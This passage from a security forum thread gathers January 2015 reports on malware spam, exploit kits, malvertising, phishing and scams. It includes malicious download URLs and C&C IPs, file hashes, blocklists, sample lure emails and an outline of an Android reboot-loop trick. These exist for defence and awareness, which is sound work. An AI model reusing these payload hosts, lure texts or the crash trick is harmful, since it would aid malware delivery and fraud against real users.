A typical exploit landing page looks like this* which appears to be the Nuclear EK. These are hosted on the following Choopa LLC / Gamservers .com IP addresses (it is the same company with two different trading names) [clicking the IP leads to the VirusTotal results, ones identified as malicious are highlighted]:
108.61.165.69: [url]https://www.virustotal.com/en/ip-address/108.61.165.69/information/
108.61.165.70: https://www.virustotal.com/en/ip-address/108.61.165.70/information/
108.61.165.96: https://www.virustotal.com/en/ip-address/108.61.165.96/information/
108.61.167.160: https://www.virustotal.com/en/ip-address/108.61.167.160/information/
108.61.172.139: https://www.virustotal.com/en/ip-address/108.61.172.139/information/
108.61.175.125: https://www.virustotal.com/en/ip-address/108.61.175.125/information/
108.61.177.107: https://www.virustotal.com/en/ip-address/108.61.177.107/information/
108.61.177.89: https://www.virustotal.com/en/ip-address/108.61.177.89/information/
... these domains see to have a very short life. I identified nearly 3000 domains using these nameservers, the following of which are flagged as malicious by Google... Recommended minimum blocklist (Choopa LLC IPs are highlighted):
108.61.123.219
108.61.165.69
108.61.165.70
108.61.165.96
108.61.167.160
108.61.172.139
108.61.172.145
108.61.175.125
108.61.177.107
108.61.177.89
108.61.198.148
108.61.211.121
64.187.225.245
104.224.147.220
UPDATE: Choopa LLC say they have terminated those IPs**. However, it may still be worth reviewing your logs for traffic to these servers as they might identify machines that have been compromised."
* http://urlquery.net/report.php?id=1420560803160

** https://2.bp.blogspot.com/-6jzwvTDMi9U/VK1T26Lei_I/AAAAAAAAGFs/H6-oPE7HwA8/s1600/choopa.png
___

Huffington Post and Gamezone vistors targeted with malvertising, infected with ransomware
- http://net-security.org/malware_news.php?id=2936
Jan 7, 2015 - "The last days of the past and the first days of the current year have been unlucky for visitors of several popular sites including the Huffington Post and Gamezone .com, which were unknowingly serving malicious ads that ultimately led to a ransomware infection. Cyphort Lab researchers first spotted the malvertising campaign on New Year's Eve on the HuffPo's Canadian website. A few days later, the ads were served on HuffingtonPost .com. The ensuing investigation revealed that the source of the ads is advertising .com, an AOL ad-network. Visitors to the sites who were served the ads were automatically redirected to a landing page hosting either the Neutrino or the Sweet Orange exploit kit. The kits served several exploits, and if one of them was successful, a new variant of the Kovter ransowmare was downloaded and executed. Kovter* blocks the targeted computer's keyboard and mouse, usually demands a ransom of around $300, and searches the web browser's history for URLs of adult content sites to include in the ransom note. AOL has been notified of the problem, and has removed the malicious ads from rotation both in their advertising.com ad-network as well as in their adtech .de one... This is not the first time that Kovter was delivered in this way. Another malvertising campaign targeting YouTube users** was spotted in October 2014."
* http://www.net-security.org/malware_news.php?id=2450

** http://www.net-security.org/malware_news.php?id=2883
Sweet Orange exploit kit/NeutrinoEK: http://blog.trendmicro.com/trendlabs-security-intelligence/youtube-ads-lead-to-exploit-kits-hit-us-victims/

>> http://www.cyphort.com/huffingtonpost-serving-malware/
___

Fake 'Accounts Payable - Remittance Advice' SPAM - doc malware
- http://myonlinesecurity.co.uk/senior-accounts-payable-specialist-remittance-advice-word-doc-malware/
7 Jan 2015 - "'Remittance Advice for 945.66 GBP' (random amounts) pretending to come from a random named Senior Accounts Payable Specialist at a random company with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Update: we are also seeing a slightly different version with the subject Invoice 2907.51 GBP (random amounts) with an Excel XLS attachment... The email looks like:

Please find attached a remittance advice for recent BACS payment of 945.66 GBP.
Any queries please contact us.
Katie Carr
Senior Accounts Payable Specialist
BUSHVELD MINERALS LTD

7 January 2015 : REM_5160JW.doc - Current Virus total detections: 4/56*
... [1]connects to 193.136.19.160 :8080//mans/pops.php and downloads the usual dridex to %temp%\1V2MUY2XWYSFXQ.exe Current VirusTotal definitions 4/56**
RBAC_2856PJ.xls Current Virus total detections: 3/56***
... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/9bb9d75b19588ae6d5099e6f9f69485410a39da3e3c69d02db2756ad527d4e0b/analysis/1420634098/

** https://www.virustotal.com/en/file/f96c2e9c17fe8a9a93251c93ed477d0715f8a06b465420c2ffa2e713ca7b8256/analysis/1420635840/
... Behavioural information:
TCP connections
194.146.136.1: https://www.virustotal.com/en/ip-address/194.146.136.1/information/

*** https://www.virustotal.com/en/file/f50ca59a7e263a9b8f6b3432d380aebca85dfe041872812c81aafa26bf3b3973/analysis/1420636228/

1] 193.136.19.160: https://www.virustotal.com/en/ip-address/193.136.19.160/information/
___

Fake 'NUCSOFT-Payroll' SPAM - doc malware
- http://myonlinesecurity.co.uk/eliza-fernandes-nucsoft-payroll-december-2014-word-doc-malware/
7 Jan 2015 - "'NUCSOFT-Payroll December 2014' pretending to come from Eliza Fernandes <eliza_fernandes@ nucsoft .co.in> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... DO NOT follow the advice they give to enable macros to see the content... The email looks like:

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/NUCSOFT-Payroll-December-2014.jpg

7 January 2015 : Payroll Dec’14.doc . Current Virus total detections: 2/56*
... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/7705658817366db2e7e82a39207e510a89678d3b06e02a1ec6685bb05231b011/analysis/1420619222/

- http://blog.dynamoo.com/2015/01/malware-spam-eliza-fernandes-nucsoft.html
7 Jan 2015
> https://www.virustotal.com/en/file/7705658817366db2e7e82a39207e510a89678d3b06e02a1ec6685bb05231b011/analysis/1420623113/

>> https://www.virustotal.com/en/file/4d3bb0cfba9f6090e2704fe003e373002f906df0d59c68e73ff0d8a20cd36884/analysis/1420624521/

Recommended blocklist:
59.148.196.153: https://www.virustotal.com/en/ip-address/59.148.196.153/information/
74.208.11.204: https://www.virustotal.com/en/ip-address/74.208.11.204/information/
___

Malformed AndroidManifest.xml in Apps Can Crash Mobile Devices
- http://blog.trendmicro.com/trendlabs-security-intelligence/malformed-androidmanifest-xml-in-apps-can-crash-mobile-devices/
Jan 7, 2015 - "Every Android app comprises of several components, including something called the AndroidManifest.xml file or the manifest file. This manifest file contains essential information for apps, “information the system must have before it can run any of the app’s code.” We came across a vulnerability related to the manifest file that may cause an affected device to experience a -continuous- cycle of rebooting — rendering the device nearly useless to the user. The Manifest File Vulnerability: The vulnerability can cause the OS to crash through two different ways. The first involves very long strings and memory allocation. Some apps may contain huge strings in their .XML files, using document type definition (DTD) technology. When this string reference is assigned to some of the tags in AndroidManifest.xml (e.g., permission name, label, name of activity), the Package Parser will require memory to parse this .XML file. However, when it requires more memory than is available, the PackageParser will crash. This triggers a chain reaction wherein all the running services stops and the whole system consequently reboots once. The second way involves .APK files and a specific intent-filter, which declares what a service or activity can do. An icon will be created in the launcher if the manifest file contains an activity definition with this specific intent-filter:
<intent-filter>
<action android:name=”android.intent.action.MAIN”/>
<category android:name=”android.intent.category.LAUNCHER”/>
</intent-filter>
If there are many activities defined with this intent-filter, the same number of icons will be created in the home page after installation. However, if this number is too large, the .APK file will trigger a loop of rebooting. If the number of activities is bigger than 10,000:
For Android OS version 4.4, the launcher process will undergo the reboot.
For version L, the PackageParser crashes and reboots. The malformed .APK will be installed by no icon will be displayed. If the number of activities is larger than 100,000, the devices will undergo the -loop- of rebooting...
We have tested and proven that this created APK could -crash- both Android OS 4.4.4, Android OS L, -and- older versions of the platform... While this vulnerability isn’t a technically a security risk, it does put devices at risk in terms of functionality. This vulnerability can essentially leave devices useless. Affected devices can be “rescued” but -only- if the Android Debug Bridge (ADB) is activated or enabled. The only solution would be to connect the device to a computer, boot the phone in fastboot mode, and flash the ROM. Unfortunately, such actions can only be done by highly technical users as a mistake can possibly brick a device. For this issue, we recommend that users contact customer service (if their devices are still under warranty) or a reputable repair shop. We have notified Google about this issue."
___

Fake Flight QZ8501 Video on Facebook
- https://blog.malwarebytes.org/fraud-scam/2015/01/dont-share-this-fake-flight-qz8501-video-on-facebook/
Jan 6, 2015 - "... If you’re waiting on information with regards what caused the tragic crash of AirAsia Flight QZ8501, please be aware that the inevitable fake Facebook video links are now putting in an appearance. Here’s one, located at: bergkids(dot)com/qz8501 - The page is pretty bare, save for the imagery of what they claim is the plane in question and the following text:
[CRASH VIDEO] AirAsia Flight QZ8501 Crashed near east coast of Sumatera.
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/fakeqz1.jpg
Clicking the play button encourages Facebook users to share it, before being redirected to an -imitation- YouTube page located at: urvashi(dot)altervista(dot)org/video/vid(dot)php
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/fakeqz2.jpg
While visitors might think this would be the video in question, in actual fact they’re looking at a sort of -fake- video -farm- where clicking the link takes them to a wide variety of phony clip scams... From there, they’re then (re)directed to one of the links in the screenshot above. There’s everything from “You won’t eat [product x] again after seeing this” to non-existent leaked celebrity tapes. Disturbingly, two of the pages claim to show car accidents and one of them uses a rather graphic photograph. Given that people could be arriving there from a personal need to find out more information about the plane crash, this is just more proof that the people behind these pages couldn’t care less... All of the above pages return the visitor to the “main” Altervista URL, where they’ll be asked to share then be sent to another of the links in the -redirect- code. It seems to be a way of trying to drop the links on as many feeds as possible (assuming the Facebook account owner changes the share option from “just me” to people in their social circles). Should the weary clicker grow tired of this digital roundabout and simply sit on the altervista page too long, they’ll find that they’re automatically sent to a page called “Horrific Video”:
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/fakeqz5.jpg
Unlike the other pages which simply loop potential victims around while asking them to share links, this one will take them to a -survey- page if the video “player” is clicked... As with all other survey pages, the links could lead to everything from offers and personal questions to ringtone signups or software installs and are usually served up according to region... If you want to know the latest information on the AirAsia crash, please stick to news sources you know and trust. It’s extremely unlikely someone is going to have exclusive footage sitting on some video website you’ve near heard of, and the moment you’re caught in a loop of “Share this on Facebook to view” messages you can bet there’s nothing on offer except someone trying to make a fast buck."

:fear::fear: :mad:

AplusWebMaster
2015-01-08, 14:53
FYI...

Fake 'invoice EME018' SPAM – doc malware
- http://myonlinesecurity.co.uk/ieuan-james-invoice-eme018-docx-word-doc-malware/
8 Jan 2015 - "'invoice EME018.docx' pretending to come from Ieuan James <emerysieuan@ gmail .com> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email has come in corrupted on my email server and looks like this (I am sure some email servers will serve up a working version) :
–Apple-Mail-2E10F14F-2909-483A-9642-7C58A403A905
Content-Type: text/plain;
charset=us-ascii
Content-Transfer-Encoding: 7bit
–Apple-Mail-2E10F14F-2909-483A-9642-7C58A403A905
Content-Type: application/msword;
name=”invoice EME018.doc”;
x-apple-part-url=D103C3C9-1CC9-4BE2-89E7-EB608B41F92A
Content-Disposition: attachment;
filename=”invoice EME018.doc”
Content-Transfer-Encoding: base64 ...

... extracted the malicious word doc from the content.
8 January 2015 : invoice EME018.doc - Current Virus total detections: 1/56*
According to Dynamoo’s blog[1] this EME018.doc malware file will connect to one of these sites http ://ecovoyage.hi2 .ro/js/bin.exe http ://mateusz321.cba .pl/js/bin.exe - This binary is saved as %TEMP%\oHIGUIgifdg.exe and has a VirusTotal detection rate of 10/55** ..."
* https://www.virustotal.com/en/file/66a2de2890ebaf7ca4521f97a44c5f30371aea72dc1023b051fea4ef3da94ece/analysis/1420701971/

** https://www.virustotal.com/en/file/12f6d880b94e16fbc1fca0ba1c97b47373e81e03cffc8d08954db13dea1c0678/analysis/1420708713/

1] http://blog.dynamoo.com/2015/01/malware-spam-ieuan-james-invoice.html
8 Jan 2015 - "... this morning I've seen a handful of these malformed malware spams, claiming to be from a Ieuan James and with a subject of invoice EME018.docx. The body text contains some Base64 encoded data which presumably is meant to be an attachment... Recommended minimum blocklist:
59.148.196.153
74.208.11.204
129.215.249.52
78.140.164.160
37.1.208.21
86.156.238.178
In addition I suggest blocking 3NT Solutions LLP / inferno.name IP ranges on sight. I would very strongly recommend blocking the entire 37.1.208.0/21 range..."
___

Fake 'INVOICE ADVISE' and 'NOVEMBER INVOICE' SPAM - doc/xls malware
- http://blog.dynamoo.com/2015/01/malware-spam-invoice-advise-08012015.html
8 Jan 2015 - "These two -spam- runs have different email messages but the same payload. In both cases, there are multiple -fake- senders:
Sample 1 - INVOICE ADVISE 08/01/2015
From: Mia Holmes
Date: 8 January 2015 at 09:11
Subject: INVOICE ADVISE 08/01/2015
Good morning
Happy New Year
Please could you advise on the November GBP invoice in the attachment for me?
Many thanks
Kind Regards
Mia Holmes
Accountant
SULA IRON & GOLD PLC

Sample 2 - NOVEMBER INVOICE
From: Reed Barrera
Date: 8 January 2015 at 09:16
Subject: NOVEMBER INVOICE
Good morning
Happy New Year
Please could you advise on the November GBP invoice in the attachment for me?
Many thanks
Kind Regards
Reed Barrera
Controller
ASSETCO PLC

Other sender names include:
- Marlin Rodriquez
Accountant
CLONTARF ENERGY PLC
- Olive Pearson
Senior Accountant
ABERDEEN UK TRACKER TRUST PLC
- Andrew Salas
Credit Management
AMTEK AUTO
The attachment is in a Word document (in one sample it was a Word document saved as an XLS file). Example filenames include:
RBAC_9971IV.xls
INV_6495NU.doc
2895SC.doc
There are -four- different malicious files that I have seen so far, all with low detection rates [1] [2] [3] [4] which contain in turn one of these macros... leading to a download from one of the following locations:
http ://188.241.116.63 :8080/mops/pops.php
http ://108.59.252.116 :8080/mops/pops.php
http ://178.77.79.224 :8080/mops/pops.php
http ://192.227.167.32 :8080/mops/pops.php
This file is downloaded as g08.exe which is then copied to %TEMP%\1V2MUY2XWYSFXQ.exe. This file has a detection rate of 3/56*. The VT report shows a POST to 194.146.136.1:8080 (PE "Filipets Igor Victorovych", Ukraine) which is a well-known malware server which I recommend that you block. This IP is confirmed in the Malwr report which also shows a dropped DLL which is the same as found in this spam run and has a detection rate of just 2/56**."
1] https://www.virustotal.com/en/file/e0225133c9a4987fcb29c8e646225496248c16a033a565b70b77f4288071b426/analysis/1420712512/

2] https://www.virustotal.com/en/file/b018c37bd4b27d8fcfc543d05ef5c0f0477551afe4a396584c6f1b83aeacfa92/analysis/1420712527/

3] https://www.virustotal.com/en/file/b1c10f76fc15c3ca6ca89df5335d716241e57951098f7324bbe8c627430a0af6/analysis/1420712717/

4] https://www.virustotal.com/en/file/d75b7a1865bed23978462197e7b5d8f1f25dd7eec8244d29f4710dc22bf6e36e/analysis/1420713398/

* https://www.virustotal.com/en/file/bc93e9bdf92f0a9fb24ccbf053f59d79e31588a956204b4d09efff1091a40c89/analysis/1420713841/

** https://www.virustotal.com/en/file/b56547ec2ee8185f772f1cdf034573883df442e4e9fde458fcf526a97563d53b/analysis/1420714510/

- http://myonlinesecurity.co.uk/november-invoice-word-doc-excel-xls-malware/
8 Jan 2015: INV_7330KQ.doc - Current Virus total detections: 1/56*
* https://www.virustotal.com/en/file/bc93e9bdf92f0a9fb24ccbf053f59d79e31588a956204b4d09efff1091a40c89/analysis/1420713841/
... Behavioural information
TCP connections
194.146.136.1: https://www.virustotal.com/en/ip-address/194.146.136.1/information/

:fear: :mad:

AplusWebMaster
2015-01-09, 15:16
FYI...

Fake 'Monthly Invoice & Report' SPAM - malware
- http://blog.dynamoo.com/2015/01/malware-spam-do-not-reply-datasharp-uk.html
9 Jan 2015 - "This spam email pretends to be from a wholly legitimate company called Datasharp UK Ltd but it isn't, it is a spoof. Datasharp is not sending the spam, their systems have not been compromised in any way.
From: ebilling@ datasharp .co
Date: 9 January 2015 at 06:55
Subject: DO-NOT-REPLY Datasharp UK Ltd - Monthly Invoice & Report
THIS MESSAGE WAS SENT AUTOMATICALLY
Attached is your Invoice from Datasharp Hosted Services for this month.
To view your bill please go to www .datasharp .co.uk. Allow 24 hours before viewing this information.
For any queries relating to this bill, please contact hosted.services@ datasharp .co.uk or call 01872 266644.
Please put your account number on your reply to prevent delays
Kind Regards
Ebilling

So far I have seen two different Word documents attached with low detection rates at VirusTotal [1] [2] containing one of two malicious macros... which then attempt to download an additional component from the following locations:
http ://TICKLESTOOTSIES .COM/js/bin.exe
http ://nubsjackbox.oboroduki .com/js/bin.exe
The tickletootsies .com download location has been cleaned up, but the other one is still working as it downloads a file with a VirusTotal detection rate of 5/56*. That VirusTotal report also shows that it attempts to POST to 74.208.11.204:8080 (1&1, US) which has been a malware C&C server for several weeks and is definitely worth blocking.
UPDATE: the Malwr report shows connections to the following IPs which I recommend you block:
59.148.196.153
74.208.11.204 "
1] https://www.virustotal.com/en/file/1f98eb75e208270fe58e7a95dbab5facd61db611f0b0cbbc6ace61d183d2a64a/analysis/1420794297/

2] https://www.virustotal.com/en/file/e703aef67351b56c9f0d9445382ddeb15af0b852397d310944a1b654fe880d10/analysis/1420794299/

* https://www.virustotal.com/en/file/572ce4b7a105718db6ae70a1d8a28f339fe916061880a116e0d046ec92784e22/analysis/1420793909/

- http://myonlinesecurity.co.uk/not-reply-datasharp-uk-ltd-monthly-invoice-report-word-doc-malware/
9 Jan 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/DO-NOT-REPLY-Datasharp-UK-Ltd-Monthly-Invoice-Report.jpg

* https://www.virustotal.com/en/file/1f98eb75e208270fe58e7a95dbab5facd61db611f0b0cbbc6ace61d183d2a64a/analysis/1420787444/

** https://www.virustotal.com/en/file/e703aef67351b56c9f0d9445382ddeb15af0b852397d310944a1b654fe880d10/analysis/1420787603/

*** https://www.virustotal.com/en/file/572ce4b7a105718db6ae70a1d8a28f339fe916061880a116e0d046ec92784e22/analysis/1420793909/
___

Fake 'Fax' SPAM
- http://blog.dynamoo.com/2015/01/malware-spam-employee-documents.html
9 Jan 2015 - "This -fake- fax run is a variation of this one* from yesterday.
From: Fax [no-replay@ fax-voice .com]
Date: 9 January 2015 at 14:52
Subject: Employee Documents - Internal Use
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Fax Documents
DOCUMENT LINK: <redacted> ...

As before, there are several links leading to different download locations... These landing pages lead to a pair of jjencoded javascripts hosted on different files. I explained a little about those last time* ... the download location that you coax out of the script is time-limited. If you wait too long, you get a nonsense script instead. And possibly even more interesting is that every time you download the target ZIP file "message.zip ;.zip ;.zip ;" it seems to be different... That led to -10- different ZIP files containing different EXE files... Although those reports indicate some difference in the port numbers, we can see the following URLs being accessed:
http ://202.153.35.133 :55365/0901us1/HOME/0/51-SP3/0/
http ://202.153.35.133 :55365/0901us1/HOME/1/0/0/
http ://crecrec .com/mandoc/nuts12.pdf
http ://202.153.35.133 :55350/0901us1/HOME/41/7/4/
http ://samrhamburg .com/img/ml1.tar
202.153.35.133 (Excell Media Pvt Lt, India) is probably the key thing to block. Despite the differences in the downloader, they all seem to drop a randomly-named file with identical characterstics in each case. This has a VirusTotal detection rate of 1/55** and you can see the Malwr report for that file here***..."
* http://blog.dynamoo.com/2015/01/myfax-no-replaymy-faxcom-spam-campaign.html

** https://www.virustotal.com/en/file/86f0fea9f2cbe4d542f9519120a8df4c20c4ad85539601859c009639d060ce9b/analysis/1420818425/

*** https://malwr.com/analysis/ZjMwNTJiMjEwNDcyNDkxOGEzZTZmZjVjYWE0ZmQwZDU/

202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
___

Bingham McCutchen Law Firm Spam
- http://threattrack.tumblr.com/post/107594031823/bingham-mccutchen-law-firm-spam
Jan 9, 2015 - "Subjects Seen:
Judicial summons
Typical e-mail details:
Warrant to appear Please be informed that you are expected in the Hamilton County Court of Appeals on February 2nd, 2015 at 9:30 a.m. where the hearing of your case of illegal software use will take place. You may obtain protection of a lawyer, if necessary.
Please bring your identity documents to the Court on the named day. Attendance is compulsory.
The detailed plaint note is attached to this letter, please download and read it thoroughly.
Clerk of court,
Jacob Velez

Malicious URLs:
joalpe.firebearstudio .com/dir.php?bh=oBRzRrtM0A02ooUI1aER2YGsHzIP29bCneRZntfom+A=
Malicious File Name and MD5:
PlaintNote_BinghamMcCutchen_00588315.exe (E1A7061CCB8997EAB296AA84454B072B)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/7039d07d7335501cb375a1b4d3632bf5/tumblr_inline_nhwvymzDyH1r6pupn.png

Tagged: law firm, Kuluoz
___

Fake CNN Twitter Feeds SPAM weight loss links
- https://blog.malwarebytes.org/fraud-scam/2015/01/fake-cnn-twitter-feeds-spam-weight-loss-links/
Jan 9, 2014 - "We’ve noticed a number of fake CNN-themed Twitter accounts driving traffic to a couple of different weight loss sites. The accounts in question are:
CNNOnly
TheCNNBreak
MyCNNNews
CNNHotline
All of the above started posting their links in the last few hours... Curiously, they all stopped posting their random mish-mash of memes and joke images around December 18 or 19, so it’s possible they could be formally parked bots which have taken on a new lease of life in some way. We’ve also seen non CNN-themed accounts sending out the same links. To give you an idea of click totals, the stats for two of the links we’ve seen are as follows:
bit(dot)ly/12NTPUP – 25,814 clicks
bit(dot)ly/1zxVKtB – 37,262 clicks
Worth noting that both of those links were created December 10, and as you now have to log into Bit.ly to see additional stats – and I can’t currently login – we can’t comment on what percentage of those clicks are very recent. All the same, we shouldn’t look to keep clicking now and encourage -more- spam as a result. Twitter spam runs are one of those things which will never go away, and it pays to have an idea of the kind of antics* spammers get up to. If you’re looking for some advice on how to keep your Twitter account safe you may wish to look at the latter half of this post** while you’re at it..."
* https://blog.malwarebytes.org/?s=twitter+spam

** https://blog.malwarebytes.org/fraud-scam/2014/01/twitter-spam-rides-again-keeping-your-account-safe/

:fear: :mad: :fear:

AplusWebMaster
2015-01-12, 15:49
FYI...

Fake 'Summary Paid Against' SPAM - doc malware
- http://myonlinesecurity.co.uk/jason-bracegirdle-jps-projects-ltd-summary-paid-word-doc-malware/
12 Jan 2015 - "'Summary Paid Against' pretending to come from Jason Bracegirdle JPS Projects Ltd <jason.bracegirdle@ jpsprojectsltd .co.uk>with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email contains the same malware payload as today’s Invoice from 'simply carpets of Keynsham Ltd' - Word doc malware* although the file attachment has a different name...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/Summary-Paid-Against.jpg

11 January 2015: Copy of Weekly Summary 28 12 2014 w.e 28.12.14.doc - Current Virus total detections: 3/54**
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* http://myonlinesecurity.co.uk/invoice-simply-carpets-keynsham-ltd-word-doc-malware/

** https://www.virustotal.com/en/file/10eca59c3d4df784bbb5fb581adf65dbb0c7ec4d95476816cb0f9ce4100b27e3/analysis/1421063953/

- http://blog.dynamoo.com/2015/01/this-fake-finance-email-appears-to-be.html
12 Jan 2015
1] https://www.virustotal.com/en/file/07b3284bc17ea667c8239d402a70005150ab005508234f8f4c6e9b11698287c7/analysis/1421065786/

2] https://www.virustotal.com/en/file/10eca59c3d4df784bbb5fb581adf65dbb0c7ec4d95476816cb0f9ce4100b27e3/analysis/1421065795/

> http://blog.dynamoo.com/2015/01/malware-spam-invoice-from-simply.html
12 Jan 2015
Recommended blocklist:
59.148.196.153
74.208.11.204 "
___

Outlook Settings Spam
- http://threattrack.tumblr.com/post/107897760068/outlook-settings-spam
Jan 12, 2015 - "Subjects Seen:
Important - New Outlook Settings
Typical e-mail details:
Please carefully read the downloaded instructions before updating settings.
campusnut .com/outlook/settings.html
This e-mail and / or any attachment(s) is intended solely for the above-mentioned recipient(s) and it may contain confidential or privileged information. If you have received it in error, please notify us immediately at helpdesk@ Outlook-us.com and delete the e-mail. You must not copy it, distribute it, disclose it or take any action in reliance on it.

Malicious URLs:
campusnut .com/outlook/settings.html
images .californiafamilyfitness.com/outlook/settings.html
data.gamin .cz/outlook/settings.html
capslik .com/outlook/settings.html
duedisnc .it/outlook/settings.html
cwvancouver .com/outlook/settings.html
eu1.panalinks .com/outlook/settings.html
indemnizaciongarantizada .com/outlook/settings.html
dprofessionals .org/outlook/settings.html
homewoodsuitestremblant .com/outlook/settings.html
ig4mbeco .com/outlook/settings.html
bestni .com/outlook/settings.html
boryapim .com/outlook/settings.html
hinchablessegarra .com/outlook/settings.html
bonificachiana .it/outlook/settings.html
Malicious File Name and MD5:
outlook_setting_pdf.exe (9F2018FC3C7DE300D1069460559659F4)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/16f8ee0bb94ce84727dff6d414dd3a33/tumblr_inline_ni2n28AfD81r6pupn.png

Tagged: Outlook, Upatre

- http://blog.dynamoo.com/2015/01/malware-spam-important-new-outlook.html
12 Jan 2015
... outlook_setting_pdf.exe
* https://www.virustotal.com/en/file/e4f76ca8fd1f708736bf5a47703099878e085e7b9b12ca98656428be1de284a5/analysis/1421077347/
"... Recommended blocklist:
202.153.35.133
morph-x .com
coffeeofthemonth .biz "

202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
___

iPhone 6 SCAM
- https://blog.malwarebytes.org/fraud-scam/2015/01/iphone-6-scam-returns/
Jan 12, 2015 - "... a familiar -scam- on the verge of a come-back:
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/brad.png
... we first encountered the spammed link on LinkedIn, thanks to a user named Kolko Kolko, who according to his profile is a coach and has the face of an A-list celebrity. Doing a quick online search using the Goog.gl shortened URL brings up other domains—Google Plus, Livejournal, and Picasa, specifically — where the list is also being posted and shared. Once users click-the-link, they are directed to a survey -scam- page. Below is an example:
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/survey.png
The above page is a type of survey that gives users the option to skip. Doing so, however, opens additional layers of survey pages that needs skipping until such a point that users encounter a page they could not escape, such as this:
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/more-surveys.png
... the surveys vary depending on the user’s location... Should you encounter any posts from random users on sites you frequent with regard to claiming an iPhone 6, don’t click-the-link... warn friends and contacts on that site to avoid falling for it..."
___

Phish - Barclaycard Credit limit increase
- http://myonlinesecurity.co.uk/barclaycard-credit-limit-increase-phishing/
12 Jan 2015 - "'Credit limit increase' pretending to come from Barclaycard <barclaycard@ mail.barclaycard .co.uk>is one of the latest phish attempts to steal your Bank, credit card and personal details. We are seeing a quite big run of this email today. We see these phishing emails frequently, but today’s spam run of them has a much larger number than usual. This one only wants your personal details, Barclaycard log in details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/Credit-limit-increase-email.jpg

If you open the attached html file you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/barclaycard-Credit-limit-increase.jpg
When you fill in your user name and password you get a page where the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format. They then send you on to the genuine Barclaycard website..."
___

Google/Microsoft feud over latest 0-day disclosures
- http://www.infoworld.com/article/2867402/operating-systems/google-zero-day-disclosure-fuels-feud-with-microsoft.html
Jan 12, 2015 - "... The subject is the long-running feud between Google and Microsoft over the handling of zero-day flaws. Google engineer Tavis Ormandy has built quite a reputation in security circles for finding zero days in Windows and notifying Microsoft. If no action is forthcoming from Microsoft in a pre-determined amount of time (usually 90 days), Ormandy releases the details (presumably with Google's permission), typically on the Full Disclosure mailing list... The process is now formally supported by Google, under the name Project Zero*. There's no better way I know to get Microsoft's attention. The latest instances actually concern two zero-day bugs, both reported by a Google researcher known as Forshaw... Here's how the argument boils down, in my estimation. If you trust Microsoft to fix the holes in Windows, then Coordinated Vulnerability Disclosure - where we, as customers, trust Microsoft to dig in and fix problems as soon as they're discovered - is a great idea. We would trust Microsoft to fix the problems expeditiously, because other people may have discovered the problem already. We also trust Microsoft to put enough money into the patching effort to make the fixes appear quickly and accurately. If you don't trust Microsoft, then the question becomes how best to hold Microsoft's feet to the fire. Although some believe in full, immediate disclosure, I don't buy that. There has to be a better way. Google's approach seems to me a reasonable one - although it's arguable that the zero-day notification window should be extended to 120 days..."
* http://googleonlinesecurity.blogspot.fr/2014/07/announcing-project-zero.html

> http://blogs.technet.com/b/msrc/archive/2015/01/11/a-call-for-better-coordinated-vulnerability-disclosure.aspx
___

TorrentLocker -ransomware- hits ANZ Region
- http://blog.trendmicro.com/trendlabs-security-intelligence/torrentlocker-ransomware-hits-anz-region/
Jan 11, 2015 - "... the EMEA (Europe-Middle East-Africa) region experienced a surge in ransomware, specifically, crypto-ransomware attacks. It appears that these attacks are no longer limited to that region. Research from Trend Micro engineers shows that the ANZ (Australia-New Zealand) region is the latest to be greatly affected by this type of malware—this time by TorrentLocker ransomware. The Infection Chain:
Infection diagram for ANZ attacks:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/ANZ-cryp11.jpg
